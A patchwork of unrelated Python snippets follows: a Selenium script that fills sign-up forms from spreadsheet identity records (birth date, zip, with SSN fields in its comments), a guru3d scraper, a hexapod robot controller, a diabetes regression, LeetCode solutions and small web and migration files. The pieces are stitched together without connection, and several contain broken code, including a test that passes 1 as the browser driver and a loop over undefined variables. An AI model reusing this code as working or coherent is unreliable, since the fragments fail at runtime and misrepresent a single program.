    # Birthday split into [MM, DD, YYYY] select values.
    date_of_birth = Submit_handle.get_auto_birthday(submit['Uspd']['date_of_birth'])
    # MM
    s1 = Select(chrome_driver.find_element_by_xpath('//*[@id="month"]'))
    s1.select_by_value(date_of_birth[0])
    # DD
    s1 = Select(chrome_driver.find_element_by_xpath('//*[@id="day"]'))
    s1.select_by_value(date_of_birth[1])
    # Year
    s1 = Select(chrome_driver.find_element_by_xpath('//*[@id="year"]'))
    s1.select_by_value(date_of_birth[2])
    sleep(5)
    # i agree — checkbox may be off-screen, so scroll to it first
    element = selenium_funcs.scroll_and_find_up(chrome_driver,'//*[@id="signupForm"]/div[12]/label/input')
    element.click()
    # sleep(2)
    try:
        # get paid — optional co-registration checkbox; ignore if absent
        element = selenium_funcs.scroll_and_find_up(chrome_driver,'//*[@id="signup_coreg"]/div/div/label/input[1]')
        element.click()
    except:
        pass
    # chrome_driver.find_element_by_xpath('').click()
    # chrome_driver.find_element_by_xpath('//*[@id="signupForm"]/div[12]/label/input').click()
    # continue — submit the form, wait for the follow-up page to settle
    chrome_driver.find_element_by_xpath('//*[@id="signupForm"]/button').click()
    sleep(30)
    chrome_driver.refresh()
    sleep(5)
    chrome_driver.close()
    chrome_driver.quit()
    return 1
def test():
    """Manual driver: pull one identity record from the sheet and submit it."""
    Mission_list = ['10000']
    Excel_name = ['Uspd','']
    Email_list = ['hotmail.com','outlook.com','yahoo.com','aol.com','gmail.com']
    submit = db.read_one_excel(Mission_list,Excel_name,Email_list)
    # print(submit)
    # date_of_birth = Submit_handle.get_auto_birthday(submit['Uspd']['date_of_birth'])
    # print(date_of_birth)
    # NOTE(review): web_submit's second positional parameter is chrome_driver,
    # so this call passes 1 as the driver (debug stays 0) and will fail at
    # chrome_driver.get(); a real driver (plus debug=1?) was probably intended.
    web_submit(submit,1)
    # print(submit['Uspd'])
    # print(submit['Uspd']['state'])
    # print(submit['Uspd']['city'])
    # print(submit['Uspd']['zip'])
    # print(submit['Uspd']['date_of_birth'])
    # print(submit['Uspd']['ssn'])
def test1():
    """Print one random 0/1 draw (manual check of the gender coin flip)."""
    coin = random.randint(0, 1)
    print(coin)
if __name__=='__main__':
    # Run the one-shot submission when executed directly.
    test()
    print('......')
|
import os
import time
import requests
import random
from slackclient import SlackClient
from pyquery import PyQuery
if __name__ == "__main__":
    # Scrape the newest NVIDIA driver post from guru3d's category listing.
    pre_url = 'http://www.guru3d.com/'
    url = 'http://www.guru3d.com/files-categories/videocards-nvidia-geforce-vista-%7C-7.html'
    # Desktop UA string so the site serves the regular HTML layout.
    headers = {'user-agent': "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10; rv:33.0) Gecko/20100101 Firefox/33.0"}
    forum_page = requests.get(url, headers=headers).content
    pq = PyQuery(forum_page)
    # The first <h1> is the latest post; its text up to 'driver' is the version.
    first_post_title = pq("h1")[0]
    driver_version = first_post_title.text_content().split('driver')[0].strip()
    # The post link lives two sibling elements after the title.
    page_url = pre_url + first_post_title.getnext().getnext().find('a').get('href')
|
# Read w from stdin and accumulate w! in `seed`.
w = int(input())
seed = 1
for j in range(1,w+1):
    seed = seed * j
# NOTE(review): the source's indentation was ambiguous; this prints only the
# final factorial — confirm the print was not meant inside the loop.
print (seed)
|
# -*- coding: ms949 -*-
import pandas as pd
# FIX: sklearn.model_selection._split and sklearn.linear_model.logistic are
# private modules (removed in modern scikit-learn); import the public API.
from sklearn.model_selection import train_test_split
from sklearn.linear_model import LogisticRegression

# Pima-style diabetes CSV: eight unnamed feature columns plus a binary outcome.
data = pd.read_csv("diabetes.csv",
                   header=None,
                   names=['1st','2nd','3rd','4th','5th','6th','7th','8th','result'])
print(data.head())

X = data[['1st','2nd','3rd','4th','5th','6th','7th','8th']]
y = data['result']
# Hold out 25% of the rows for evaluation; fixed seed for reproducibility.
X_train, X_test, y_train, y_test = train_test_split(X, y,
                                                    test_size=.25,
                                                    random_state=20)
lr = LogisticRegression()
lr.fit(X_train, y_train)
# Show the predictions for the first ten held-out rows, then the accuracy.
print(lr.predict(X_test[0:10]))
print(lr.score(X_test, y_test))
|
from graphgallery.backend import *
from graphgallery.data_type import *
# modules
from graphgallery import nn
from graphgallery import backend
from graphgallery import gallery
from graphgallery import utils
from graphgallery import sequence
from graphgallery import data
from graphgallery import datasets
from graphgallery import functional
from graphgallery import attack
from .version import __version__
# Public re-export list for `from graphgallery import *`.
# NOTE(review): "graphgallery" names the package itself, and the star-imported
# backend/data_type symbols are not listed individually — confirm intentional.
__all__ = [
    "graphgallery", "nn", "gallery", "utils", "sequence", "data", "datasets",
    "backend", "functional", "attack", "__version__"
]
|
import argparse, textwrap
import os
import time
import numpy as np
import leg
from adafruit_servokit import ServoKit
import path_scaling as ps
import socket
# --- Shared state updated by the socket-client callbacks ---
# Pixel coordinates of the tracked target ("link") and the laser dot.
link_x, link_y, laser_x, laser_y = 0, 0, 0, 0
head_turn = False  # camera-head sweep on/off (set by Motion ON/OFF messages)
init_body_turn, travel_distance, theta = 0, 0, 0

# Movement state globals
MOVE_FORWARD = False
MOVE_BACKWARD = False
TURN_LEFT = False
TURN_RIGHT = False
orientation_back = False  # True while the gait is currently reversed
current_position = 0.0    # distance walked toward travel_distance
current_angle = 0

# Two PCA9685 servo hats: 0x40 drives legs 0-2 plus the turret, 0x41 legs 3-5
# (see hat_map/pin_map in update_angs and set_laser_servos).
kit1 = ServoKit(channels=16,address=0x40)
kit2 = ServoKit(channels=16,address=0x41)

# Prameters for the legs (populated by init_legs from CLI arguments)
FIRST_SEG_LEN = 0
SECOND_SEG_LEN = 0
THIRD_SEG_LEN = 0
num_legs = 6
x_offset = 0
y_radius = 0
z_radius = 0
y_offset = 0
z_offset = 0
base_locs = []   # leg base positions around the body
base_angs = []   # leg base angles (radians)
positions = []   # shared foot-path waypoints
legs = []        # leg.leg instances
angs = []        # latest per-leg servo angles

# Turret parameters: L/R are the two laser servo angles, L0/R0 the rest pose.
L0 = 82.5
R0 = 77.5
L = L0
R = R0
laser_pos = 0
# 45-degree rotation matrix used to map screen-space error into the turret frame.
R_CW = np.array([[np.cos(45*np.pi/180), -np.sin(45*np.pi/180)], [np.sin(45*np.pi/180), np.cos(45*np.pi/180)]])
def resetData():
    """Zero the tracking/motion globals between commands.

    NOTE(review): head_turn is declared global here but deliberately left
    unreset (matches original behavior) — confirm that is intentional.
    """
    global link_x, link_y, laser_x, laser_y
    global head_turn, init_body_turn, travel_distance, theta
    link_x = link_y = 0
    laser_x = laser_y = 0
    init_body_turn = 0
    travel_distance = 0
    theta = 0
# Sample Position Input: "Position - Link: 152,156. Laser: 142,138"
def updatePosition(pos_data):
    """Parse a Position message into the link_*/laser_* pixel-coordinate globals."""
    global link_x, link_y, laser_x, laser_y

    def coords_of(section):
        # "Link: 152,156" -> (152, 156)
        xy = section.split(": ")[1].split(",")
        return int(xy[0]), int(xy[1])

    payload = pos_data[11:]          # strip the "Position - " prefix
    sections = payload.split(". ")
    link_x, link_y = coords_of(sections[0])
    laser_x, laser_y = coords_of(sections[1])
# Sample Motion Input: "Motion - Body_Turn: -12, Distance: 7, Theta: 45",
# or just "Motion - ON" / "Motion - OFF" to toggle the head sweep.
def updateMotion(motion_data):
    """Parse a Motion message into the gait-command globals."""
    global head_turn, init_body_turn, travel_distance, theta
    payload = motion_data[9:]        # strip the "Motion - " prefix
    if "ON" in payload:
        head_turn = True
    elif "OFF" in payload:
        head_turn = False
    else:
        fields = payload.replace(" ", "").split(",")
        init_body_turn = float(fields[0].split(":")[1])
        travel_distance = float(fields[1].split(":")[1])
        theta = int(fields[2].split(":")[1])
def parse_arguments():
    """Parse the hexapod geometry CLI arguments.

    Returns an argparse.Namespace with the leg segment lengths (cm), the
    foot-path offsets/radii, and a six-element list of per-leg z offsets.
    """
    parser = argparse.ArgumentParser(formatter_class=argparse.RawTextHelpFormatter)
    # segment lengths are cm
    parser.add_argument("--seg1_len",dest="seg1_len",type=float,default=3.9,help="length of 1st seg (cloest to body)")
    parser.add_argument("--seg2_len",dest="seg2_len",type=float,default=7.75,help="length of 2nd seg (middle)")
    parser.add_argument("--seg3_len",dest="seg3_len",type=float,default=12.8,help="length of 3rd seg (farthest from body)")
    parser.add_argument("--x_offset",dest="x_offset",type=float,default=10)
    parser.add_argument("--y_radius",dest="y_radius",type=float,default=4)
    parser.add_argument("--z_radius",dest="z_radius",type=float,default=5)
    parser.add_argument("--y_offset",dest="y_offset",type=float,default=0)
    parser.add_argument("--z_offset",dest="z_offset",type=float,default=-16)
    # BUG FIX: type=list split the argument string into single characters;
    # accept a comma-separated list of per-leg offsets instead (default kept).
    parser.add_argument("--z_offset_heights",dest="z_offset_heights",
                        type=lambda s: [float(v) for v in s.split(",")],
                        default=[0,0,0,0,0,0])
    return parser.parse_args()
# Used for printing the angle of every joint
def print_angs(num_legs, angs):
    """Print each leg's joint-angle array, one block per leg."""
    for leg_idx, leg_angs in enumerate(angs[:num_legs]):
        print("Leg ", leg_idx)
        print(leg_angs)
        print("")
# Used for updating the servo angles through the servo hat
def update_angs(num_legs,angs):
    """Write every leg's three joint angles out to the two PCA9685 hats.

    angs holds one [j0, j1, j2] array per leg; the third joint is written
    with a +90 offset.
    """
    '''
    for (i) in range(num_legs):
        kit.servo[3*i+0].angle = angs[i][0]
        kit.servo[3*i+1].angle = angs[i][1]
        kit.servo[3*i+2].angle = angs[i][2]+90
    '''
    # Legs 0-2 hang off hat 1 (0x40), legs 3-5 off hat 2 (0x41).
    hat_map = [1,1,1,2,2,2]
    # Per-leg servo channel triples on the owning hat.
    # NOTE(review): leg 3's channels [7,8,9] do not follow the [0-2]/[3-5]/[6-8]
    # pattern of the other legs — confirm against the actual wiring.
    pin_map =[[0,1,2],[3,4,5],[6,7,8],[7,8,9],[10,11,12],[13,14,15]]
    for i in range(0,num_legs):
        #angs[5][1] = angs[5][1] - 5
        if (hat_map[i] == 1):
            for p,s in zip(pin_map[i],[0,1,2]):
                if (s==2):
                    kit1.servo[p].angle = angs[i][s]+90
                else:
                    kit1.servo[p].angle = angs[i][s]
        else:
            for p,s in zip(pin_map[i],[0,1,2]):
                if (s==2):
                    kit2.servo[p].angle = angs[i][s]+90
                else:
                    kit2.servo[p].angle = angs[i][s]
def init_legs(args):
    """Build the six leg objects, compute the shared foot path, and zero the servos.

    Populates the module-level geometry globals from the parsed CLI arguments.
    """
    global x_offset, y_radius, z_radius, y_offset, z_offset, base_locs, base_angs, positions, legs, num_legs, angs
    # NOTE: the *_SEG_LEN names here are locals (the module-level constants
    # stay 0); they are only forwarded into the leg constructor below.
    FIRST_SEG_LEN = args.seg1_len
    SECOND_SEG_LEN = args.seg2_len
    THIRD_SEG_LEN = args.seg3_len
    x_offset = args.x_offset
    y_radius = args.y_radius
    z_radius = args.z_radius
    y_offset = args.y_offset
    z_offset = args.z_offset
    z_offset_heights = args.z_offset_heights
    # Leg bases spaced evenly around the body.
    base_locs = []
    base_angs = []
    angle_inc = 2*np.pi/num_legs
    for i in range(num_legs):
        base_angs.append(i*angle_inc)
        base_locs.append([1*np.cos(base_angs[i]),-1*np.sin(base_angs[i]),0])
    k = 19;
    num_points = k;
    # Foot path (19 waypoints): 8 at constant z, then 3 whose z varies with
    # z_radius (the lift over), then 8 more at constant z.
    for t in range(0,8):
        positions.append([x_offset, y_radius*np.cos(-1*t/(8-1)*np.pi/2-np.pi/2)+y_offset, z_offset])
    for t in range(0,3):
        positions.append([x_offset, y_radius*np.cos(-1*t/(3-1)*np.pi-np.pi)+y_offset, z_radius*np.sin(-1*t/(5-1)*np.pi-np.pi)+z_offset])
    for t in range(0,8):
        positions.append([x_offset, y_radius*np.cos(-1*t/(8-1)*np.pi/2)+y_offset, z_offset])
    legs = []
    for (i,b_loc,b_ang) in zip(range(num_legs),base_locs,base_angs):
        # Odd-numbered legs run half a cycle out of phase (tripod-style gait)
        # when all six legs are present.
        if i%2 == 1:
            if num_legs == 6:
                step_offset = 0.5
            else:
                step_offset = 0
        else:
            step_offset = 0
        legs.append(leg.leg(num_segs=3,lens=[FIRST_SEG_LEN,SECOND_SEG_LEN,THIRD_SEG_LEN],base_location=b_loc,base_angle=b_ang,positions=positions,forward_angle=b_ang,leg_ID=i,step_offset=step_offset,z_offset_height=z_offset_heights[i]))
    # Push the initial pose out to the servos.
    angs = []
    for l in legs:
        angs.append(l.get_angles_deg(mode='servo')+90)
    print_angs(num_legs,angs)
    update_angs(num_legs,angs)
    print("First leg path: after init")
    print(legs[0].positions)
    print("First leg forward angle: after init")
    print(legs[0].forward_angle)
def init_laser():
    """Drive the laser-turret servos to their rest pose (L0, R0)."""
    set_laser_servos(L0,R0)
def move(init_body_turn, travel_distance, theta):
    """Advance the walking gait one tick toward the commanded pose.

    Turns every leg by theta degrees, then steps forward/backward until
    current_position reaches travel_distance (within 0.5 units).

    Returns:
        True when no further motion is needed this command, else False.
    """
    global current_position, legs, num_legs, angs, orientation_back
    # Set movement state base on input string values
    if current_position < travel_distance and np.abs(current_position-travel_distance) > 0.5:
        MOVE_FORWARD = True
        MOVE_BACKWARD = False
    elif current_position > travel_distance and np.abs(current_position-travel_distance) > 0.5:
        MOVE_FORWARD = False
        MOVE_BACKWARD = True
    else:
        # Close enough: stop and reset the odometer for the next command.
        MOVE_FORWARD = False
        MOVE_BACKWARD = False
        current_position = 0
    if theta < 0:
        print("Turning right")
    elif theta > 0:
        print("Turning left")
    # Rotate every leg's stride direction by theta (degrees -> radians).
    for (l,i) in zip(legs,range(num_legs)):
        l.turn(theta*np.pi/180)
    if MOVE_FORWARD:
        if not orientation_back:
            for (l,i) in zip(legs,range(num_legs)):
                l.step()
        else:
            # Gait was reversed; flip it forward before stepping.
            for (l,i) in zip(legs,range(num_legs)):
                l.reverse()
                l.step()
            orientation_back = False
        # Distance advanced per tick; presumably stride length per waypoint
        # (5/19 * 3/2) — confirm against the leg path geometry.
        current_position = current_position + 5/19*3/2
    elif MOVE_BACKWARD:
        if not orientation_back:
            for (l,i) in zip(legs,range(num_legs)):
                l.reverse()
                l.step()
            orientation_back = True
        else:
            for (l,i) in zip(legs,range(num_legs)):
                l.step()
        current_position = current_position - 5/19*3/2
    # Push the updated joint angles out to the servos.
    for (l,k) in zip(legs,range(num_legs)):
        angs[k] = l.get_angles_deg(mode='servo')+90
    update_angs(num_legs,angs)
    return ((not MOVE_FORWARD) and (not MOVE_BACKWARD))
def set_laser_servos(ang1,ang2):
    """Write the two turret servo angles (channels 14/15 on hat 1)."""
    kit1.servo[14].angle = ang1
    kit1.servo[15].angle = ang2
def move_laser(link_x, link_y, laser_x, laser_y):
    """Aim the laser turret toward the tracked target position.

    Converts the target's pixel offset from screen centre into turret servo
    angles (rotated 45 degrees via R_CW), clamps them to the mechanical
    limits, and writes them out.

    Returns:
        True always (the caller loops until legs and laser both report done).
    """
    global L, R, laser_err
    screen_dim_x = 960
    screen_dim_y = 720
    # Target lost (negative coords): aim at the screen centre (zero error).
    if link_x < 0:
        link_x = screen_dim_x / 2
    if link_y < 0:
        link_y = screen_dim_y / 2
    # BUG FIX: the error terms referenced undefined names dim_x/dim_y;
    # they must be the screen dimensions defined above.
    laser_err = [link_x - screen_dim_x / 2, link_y - screen_dim_y / 2]
    # Rotate the pixel-space error into the turret's servo frame.
    laser_err = np.matmul(R_CW, laser_err)
    # Scale to the usable servo spans (R: 50..105, L: 60..105).
    dR = -laser_err[0] / screen_dim_x * (105 - 50)
    dL = -laser_err[1] / screen_dim_y * (105 - 60)
    R = R0 + dR
    L = L0 + dL
    # Clamp to the mechanical limits.
    edge = False
    if R >= 105:
        R = 105
        edge = True
    elif R <= 50:
        R = 50
        edge = True
    if L >= 105:
        L = 105
        edge = True
    elif L <= 60:
        L = 60
        edge = True
    #print("L: ",L)
    #print("R: ",R)
    set_laser_servos(L, R)
    return True
def client_program():
    """Socket-client loop: receive tracking/motion messages and act on them.

    Protocol: each message carries a "clean" marker; the payload after it
    starts with either "Position" (target/laser pixel coords) or "Motion"
    (gait command / head-sweep toggle).
    """
    global theta
    host = "192.168.0.101"  # tracking server address
    port = 5001
    client_socket = socket.socket()
    client_socket.connect((host, port))
    while True:
        message = client_socket.recv(1024).decode()
        # Everything before the "clean" marker is a stale fragment; drop it.
        message = message.split("clean")[1]
        print(message)
        if (message[0:8] == "Position"):
            updatePosition(message)
        elif (message[0:6] == "Motion"):
            updateMotion(message)
        print("Position Data:", link_x, link_y, laser_x, laser_y)
        print("Motion Data:", head_turn, init_body_turn, travel_distance, theta)
        start_time = time.time()
        # Head sweep via the continuous-rotation servo on channel 13.
        if head_turn:
            kit1.continuous_servo[13].throttle = 0.15
        else:
            kit1.continuous_servo[13].throttle = 0.05
        # Run the gait + laser tracking until both report completion.
        while True:
            move_legs_result = move(init_body_turn, travel_distance, theta)
            theta = 0  # apply the commanded turn only on the first tick
            move_laser_result = move_laser(link_x, link_y, laser_x, laser_y)
            if (move_legs_result and move_laser_result):
                break
        """
        print("First leg path: after data")
        print(legs[0].positions)
        print("First leg forward angle: after data")
        print(legs[0].forward_angle)
        """
        resetData()
    # NOTE(review): unreachable — the while True above never breaks.
    client_socket.close()
if __name__ == '__main__':
    # Boot sequence: parse geometry, zero the legs, park the laser, then listen.
    args = parse_arguments()
    init_legs(args)
    init_laser()
    client_program()
|
#
# find resize partition in descriptor file
# return partition_number sector
#
import json
import sys
# FIX: converted Python-2 print statements to function-call form, which is
# valid on both Python 2 and 3 (single-expression parentheses).
if len(sys.argv) != 2:
    # Exactly one argument — the JSON descriptor path — is required.
    print("Descriptor file required")
    exit(1)

desc = sys.argv[1]
with open(desc) as descfile:
    data = json.load(descfile)

# Report the first partition flagged resizable as "<number> <sector>".
for p in data['partition']:
    if p['resize'] == 'y':
        # NOTE(review): assumes 'number' and 'sector' are JSON strings;
        # concatenation fails if the descriptor stores them as numbers.
        print(p['number'] + ' ' + p['sector'])
        exit(0)

print('Resizeable partition not defined')
exit(1)
##
|
""" shoppinglist/views.py"""
from rest_framework import generics, response,reverse
from rest_framework.decorators import api_view
# Function based view to return an object with url to api
@api_view(['GET'])
def api_root(request, format=None):
    """API entry point: maps resource names to their hyperlinked list URLs."""
    return response.Response({
        'shoppinglist': reverse.reverse('api:create_list', request=request, format=format),
    })
|
# ****************************************************************** #
# ************************* Byte of Python ************************* #
# ****************************************************************** #
########################
# user_input
########################
# def reverse(text):
# return text[::-1]
# def is_palindrome(text):
# return text == reverse(text)
# something = input("Enter text: ")
# if is_palindrome(something):
# print("Yes, it is a palindrome")
# else:
# print("No, it is not a palindrome")
########################
# using_file
########################
# poem = """\
# Programming is fun
# When the work is done
# if you wanna make your work also fun:
# use Python!
# """
# # if poem.txt does not exist, then create it.
# f = open("poem.txt", "w")
# f.write(poem)
# f.close()
# f = open("poem.txt")
# while True:
# line = f.readline()
# if len(line) == 0:
# break
# print(line, end = "")
# f.close()
########################
# pickling
########################
# import pickle
# shoplistfile = "shoplist.data"
# shoplist = ["apple", "mango", "carrot"]
# f = open(shoplistfile, "wb")
# pickle.dump(shoplist, f) # dump the object to a file
# f.close()
# del shoplist # destroy the shoplist variable
# f = open(shoplistfile, "rb")
# storedlist = pickle.load(f) # load the object from the file
# print(storedlist)
########################
# unicode — str vs u"" and UTF-8 file round-trip
# NOTE(review): the original header said "python2", but open(..., encoding=...)
# below is Python-3-only syntax; this section runs on Python 3.
########################
print(type("hello world"))   # <class 'str'> on Python 3
print(type(u"hello world"))  # the u-prefix is a no-op alias for str on Python 3
# Write a non-ASCII string to a UTF-8 file and read it back.
f = open("abc.txt", "wt", encoding = "utf-8")
f.write("中国")
f.close()
text = open("abc.txt", encoding = "utf-8").read()
print(text)
class Solution(object):
    def moveZeroes(self, nums):
        """Move every zero to the end of nums in place, keeping the
        relative order of the non-zero elements."""
        # Compact the non-zeros to the front, tracking the next write slot.
        write = 0
        for value in nums:
            if value != 0:
                nums[write] = value
                write += 1
        # Everything after the last written non-zero becomes zero.
        for tail in range(write, len(nums)):
            nums[tail] = 0
# Ad-hoc checks: mixed zeros, single zero, empty list, single non-zero.
a = [0, 1, 0, 3, 12, 0, 22, 0]
Solution().moveZeroes(a)
print(a)
a = [0]
Solution().moveZeroes(a)
print(a)
a = []
Solution().moveZeroes(a)
print(a)
a = [1]
Solution().moveZeroes(a)
print(a)
# -*- coding: utf-8 -*-
from collections import Counter
class Solution:
    def majorityElement(self, nums):
        """Return the value occurring most often in nums (the majority element)."""
        tally = Counter(nums)
        (winner, _count), = tally.most_common(1)
        return winner
if __name__ == "__main__":
    # Smoke tests: singleton list and a simple 2-vs-1 majority.
    solution = Solution()
    assert 1 == solution.majorityElement([1])
    assert 1 == solution.majorityElement([1, 1, 2])
|
import math
# Read n and k from stdin; print n as a product of exactly k integers (>1),
# or -1 when n has fewer than k prime factors (with multiplicity).
n , k = map(int,input().split())

# Trial-divide by every candidate up to sqrt(n) to collect the prime factors.
# (FIX: removed the unused `stor` list and the redundant explicit +1 step.)
arr = []
for i in range(2, int(math.sqrt(n)) + 1):
    while n % i == 0:
        n = n//i
        arr.append(i)
if n >= 2:
    # Whatever survives the loop is a single prime factor > sqrt(original n).
    arr.append(n)

if k > len(arr):
    print(-1)
else:
    # Print the first k-1 primes verbatim, then fold the rest into one factor.
    for j in range(k-1):
        print(arr[j],end=" ")
    product = 1
    for u in range(k-1,len(arr)):
        product = product*arr[u]
    print(product)
|
from error import UnAuthorizedUser
def auth_required(req, res, resource, param):
    """Falcon-style before-hook: reject requests lacking an Authorization header.

    Raises:
        UnAuthorizedUser: when no Authorization header is present.
    """
    if req.get_header('Authorization') is None:
        raise UnAuthorizedUser()
from django.http import HttpResponse, JsonResponse
from rest_framework.views import APIView
from rest_framework.response import Response
from .models import Product
from .serializers import ProductSerializer
# Create your views here.
class ProductList(APIView):
    """List products and echo product-creation payloads."""

    def get(self, request):
        """Return every product, serialized, under the 'products' key."""
        data = Product.objects.all()
        serialized = ProductSerializer(data, many=True)
        return Response({'products': serialized.data})

    def post(self, request):
        """Echo the posted payload back (no persistence yet).

        FIX: the first parameter was misspelled 'seft'; renamed to the
        conventional 'self' (positional, so behavior is unchanged).
        """
        return Response({'products': request.data})
import math
import sys
import pandas as pd
from pandas.tools.plotting import autocorrelation_plot
import numpy as np
#from statsmodels.tsa.api import VAR
#from statsmodels.tsa.arima_model import ARIMA
#from sklearn.cross_validation import train_test_split
#from sklearn.tree import DecisionTreeClassifier
#from sklearn.metrics import accuracy_score
#from sklearn import tree
#import graphviz
##from keras.models import Sequential
##from keras.layers import Dense
#import matplotlib.pyplot as plt
'''
Takes the mean of the last k time-steps for attributes:
- mood
- arousal
- valence
- activity
- screen
Creates a training, validation and test set
'''
def categorise(x):
    '''Rounds a number to nearest 0.5, then multiplies by 10 to get a category
    value'''
    half_steps = round(x * 2)   # how many 0.5-sized steps x spans, rounded
    return int(half_steps * 5)  # each half-step is a category width of 5
if __name__ == '__main__':
    # Optional CLI arg selects a single patient (otherwise defaults to 1);
    # NOTE(review): patient_num is then never used — the loop covers all ids.
    if len(sys.argv) == 2:
        patient_num = int(sys.argv[1])
    else:
        patient_num = 1
    mses = []
    for i in range(1, 34):
        # load patient data
        try:
            data = pd.read_csv(open('./summaries_cleaned/patient_{:02d}_summary.csv'.format(i),'rb'), index_col=0, parse_dates=True)
        except:
            # Missing/unreadable summary file for this patient id; skip it.
            continue
        print('\n --- Patient {:02d} ---'.format(i))
        p_data = data['mood']
        # NOTE(review): p_data is a Series here, so rename(columns=...) is a
        # no-op and p_data.columns does not exist — this section looks
        # unfinished; confirm the intended frame shape.
        p_data.rename(columns={'mood': 'next_mood'}, inplace=True)
        p_data.rename(columns={p_data.columns[0]: 'next_mood'}, inplace=True)
        # Target: the NEXT time-step's mood (shift everything up one row).
        p_data['next_mood'] = p_data['next_mood'].shift(-1)
        p_data = p_data[:-1]
        # split into training, validation and testing set
        seg = [0.7, 0.1, 0.2]
        t = len(p_data)
        splits = [math.floor(seg[0]*t), math.floor((seg[0]+seg[1])*t)]
        train = p_data[:splits[0]]
        train2 = p_data[:splits[1]] # includes validation data
        validate = p_data[splits[0]:splits[1]]
        test = p_data[splits[1]:]
        train_x, train_y = train.iloc[:, 1:], train['next_mood']
        train2_x, train2_y = train2.iloc[:, 1:], train2['next_mood']
        validate_x, validate_y = validate.iloc[:, 1:], validate['next_mood']
        test_x, test_y = test.iloc[:, 1:], test['next_mood']
        # --- Run Model Here on p_data ---
        # MEAN PREDICTOR (Benchmark)
        # NOTE(review): `predictions` and `obs` are never defined — the mean
        # predictor body is missing, so this raises NameError at runtime; the
        # original indentation of this section was also ambiguous.
        for t in range(len(test_x)):
            square_errors = []
            for j in range(len(predictions)):
                print('Predicted: {}, observed: {}'.format(predictions[j], obs[j]))
                square_errors.append((predictions[j] - obs[j])**2)
        mse = np.mean(square_errors)
        print('\nMSE: {}'.format(mse))
        mses.append(mse)
    print('\n\nAvg. MSE (all patients): {}'.format(np.mean(mses)))
|
'''
def f(x):
return 1/(1 + x**2)
sum = 0
h = 0.2
for i in range(1, 10):
print(f(-1 + i * h))
if i % 2:
sum += 2 * f(-1 + i * h)
else:
sum += 4 * f(-1 + i * h)
sum += 1
print('sum=',sum / 15)
'''
import math
def f(x):
    """Absolute deviation of x from the reference value 0.1996668333."""
    target = 0.1996668333
    return abs(x - target)
# Evaluate the deviation at a sequence of sample points approaching the
# reference value.
print(f(0.199008))
print(f(0.1995004))
print(f(0.1996252))
print(f(0.1996564))
print(f(0.1996642))
from disease_api import *
from medicine_api import *
from doctor_api import *
import endpoints
# WSGI application exposing the three Cloud Endpoints APIs.
APPLICATION = endpoints.api_server([DoctorInfoApi,DiseaseInfoApi,MedicineInfoApi],
                                   restricted=False)
|
""" """
import logging
import time
import sys
import utils
from models import experiment_dict
from sklearn.metrics import accuracy_score
from sklearn.model_selection import train_test_split, cross_val_predict
# Module-level logger mirroring everything to stdout with timestamps.
logr = logging.getLogger(__name__)
logr.setLevel(logging.DEBUG)
sh = logging.StreamHandler(stream=sys.stdout)
formatter = logging.Formatter('%(asctime)s : %(name)s : %(levelname)s : %(message)s')
sh.setFormatter(formatter)
logr.addHandler(sh)

X_train_full, y_train_full = utils.import_training_data()

# NOTE(review): train_fraction is passed as test_size, so 80% of the data
# lands in the TEST split — confirm whether test_size=1-train_fraction was
# intended.
train_fraction = 0.8
X_train, X_test, y_train, y_test = train_test_split(X_train_full,
                                                    y_train_full,
                                                    test_size=train_fraction,
                                                    random_state=42)
print('X_train has shape {}'.format(X_train.shape))
print('y_train has shape {}'.format(y_train.shape))
def run_experiment(num):
    """Fit experiment `num`'s pipeline and log its cross-validated accuracy.

    Looks up 'expt_<num>' in models.experiment_dict, fits its pipeline on the
    train split, then scores with 3-fold cross_val_predict on the held-out
    split; timing and accuracy are logged.
    """
    start = time.time()
    logr.info('Running Experiment num={}'.format(num))
    target_model_name = 'expt_{}'.format(num)
    expt = experiment_dict[target_model_name]
    pipeline = expt['pl']
    pipeline.fit(X_train, y_train)
    cv = 3
    # NOTE(review): cross_val_predict refits the pipeline fold-by-fold on the
    # X_test data, so the fit() above does not influence these predictions.
    predictions = cross_val_predict(pipeline, X_test, y_test, cv=cv)
    logr.info('obtained accuracy = {:.2f}% with cv={}, pipeline={} '.format(
        accuracy_score(y_test,predictions)*100,
        cv,
        pipeline))
    taken = time.time() - start
    logr.info('expt {} took {} seconds'.format(num, taken ))
# Run every experiment defined in models.experiment_dict (keys expt_1..expt_N).
for i in range(1, len(experiment_dict) + 1):
    run_experiment(i)
|
"""empty message
Revision ID: 19c4b18cd911
Revises: 5ef7188ba1df
Create Date: 2019-05-26 19:46:22.004585
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = '19c4b18cd911'
down_revision = '5ef7188ba1df'
branch_labels = None
depends_on = None
def upgrade():
    # ### commands auto generated by Alembic - please adjust! ###
    # Link slots_db.doctorID to users.id (constraint name autogenerated).
    op.create_foreign_key(None, 'slots_db', 'users', ['doctorID'], ['id'])
    # ### end Alembic commands ###
def downgrade():
    # ### commands auto generated by Alembic - please adjust! ###
    # Drop the FK added in upgrade(); None relies on the autogenerated name.
    op.drop_constraint(None, 'slots_db', type_='foreignkey')
    # ### end Alembic commands ###
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Definition for singly-linked list.
class ListNode(object):
    """One node of a singly-linked list: a payload plus a next-pointer."""

    def __init__(self, val):
        self.next = None   # successor; filled in by list-building code
        self.val = val     # payload value
class LinkedList(object):
    """Minimal singly-linked-list helpers built on ListNode."""

    def __init__(self):
        self.val = None

    @staticmethod
    def add(val):
        """Create and return a fresh ListNode holding val."""
        return ListNode(val)

    def insert(self, node, val):
        """Append val at the tail of the list rooted at node; return the head.

        (Iterative form of the original recursive append — same effect.)
        """
        if node is None:
            return self.add(val)
        tail = node
        while tail.next is not None:
            tail = tail.next
        tail.next = self.add(val)
        return node

    @staticmethod
    def print(node):
        """Print every value from node to the end, one per line."""
        current = node
        while current is not None:
            print(current.val)
            current = current.next
class Solution(object):
    def reverseList(self, head):
        """
        Reverse a singly-linked list and return the new head.

        :type head: ListNode
        :rtype: ListNode

        FIX: the original walked to the tail and re-scanned for its
        predecessor each round, and its outer condition (tail.next != head)
        never became false — it dereferenced None and crashed. Replaced with
        the standard O(n) iterative pointer reversal.
        """
        prev = None
        current = head
        while current is not None:
            nxt = current.next   # remember the rest of the list
            current.next = prev  # flip this node's pointer
            prev = current
            current = nxt
        return prev              # prev is the old tail == new head
# Build the list 1 -> 0 -> 1 -> 2 -> 3 -> 4, print it, then print its reverse.
a = LinkedList()
root = a.add(1)
# print(root)
for i in range(5):
    a.insert(root, i)
    # print(i)
# print(a)
a.print(root)
x = Solution()
a.print(x.reverseList(root))
